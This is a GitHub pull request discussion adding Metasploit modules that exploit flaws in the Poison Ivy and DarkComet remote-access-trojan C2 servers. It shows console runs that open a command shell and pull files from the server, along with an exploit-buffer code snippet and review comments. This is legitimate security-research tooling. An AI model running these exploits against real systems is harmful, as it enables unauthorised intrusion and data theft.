Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too) #6940
Conversation
…rability in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't require knowledge of the secret key as it abuses a flaw in the cryptographic protocol. Note that this is a different vulnerability from the one affecting versions 2.2.0 and up (https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof). See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details.

## Console output

Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is set to 'pivypass' and unknown to attacker).

### Version 2.1.4

```
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf exploit(poisonivy_21x_bof) > check
[*] 192.168.0.104:3460 The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit

[*] 192.168.0.104:3460 - Performing handshake...
[*] Started bind handler
[*] 192.168.0.104:3460 - Sending exploit...
[*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
```
…of DarkComet versions 3.2 and up (https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf), possibly affecting earlier versions as well. The vulnerability can be exploited without knowledge of the secret key by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing for key recovery, after which the exploit can be used to download arbitrary files from a DarkComet C2 server. See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details.

## Console output

Below is an example of the exploit running against versions 5.3.1 and 4.2F (DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).

### Version 5.3.1 (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```

### Version 4.2F (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
Hi @samvartaka, I don't have time to read through your blog post at the moment or audit the module immediately, but could you provide a download for the Poison Ivy binary?

Sure, if I'm not mistaken this should be the PIVY 2.1.4 C2 server: https://mega.nz/#!plgk3K6Q!_m3Tou3ILsOp4z4oamH9b-n4kCQLg5hYD-RVJaq2C14 I ran it against a Windows XP SP3 (EN) 32-bit machine, but seeing as how the only gadget is located in the executable image itself I suppose that shouldn't matter much, other than that PIVY apparently doesn't run on newer Windows versions than XP without some patch.

Thanks, I'll take a look when I can.
```
compressedBuffer = payload.encoded + "\x90" * (0xFFD - payload.encoded.length)

# Construct exploit buffer
exploitBuffer = "A" * 4 # infoLen (placeholder)
```
I guess you could randomize these instead of ABCDs? Like:

```
Rex::Text.rand_text_alpha(4)
```
Good call @wchen-r7, I implemented your suggestions and confirmed the exploit still works fine against the 2.1.4 target.

@samvartaka Awesome. Thanks! 👍

Tested and working. Nicely spotted on the actual vuln. Merging.

Samvartaka, when I load this exploit in Metasploit and run it, it gives me the following error:

```
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/poison_ivy_c2/chunk_214.bin
```

What might be the issue? Can you please suggest a solution?

Looks like you somehow didn't check out all the files that are part of this commit. As per @wchen-r7's suggestion I stored the protocol known plaintext in a binary file named chunk_214.bin; you can find it here: https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/poison_ivy_c2 Maybe retry syncing your local repo, download the file separately, or do a new checkout?

@LoganHunt Make sure you
This looks like Kali linux. I double-checked and the latest rolling release package has the file included. |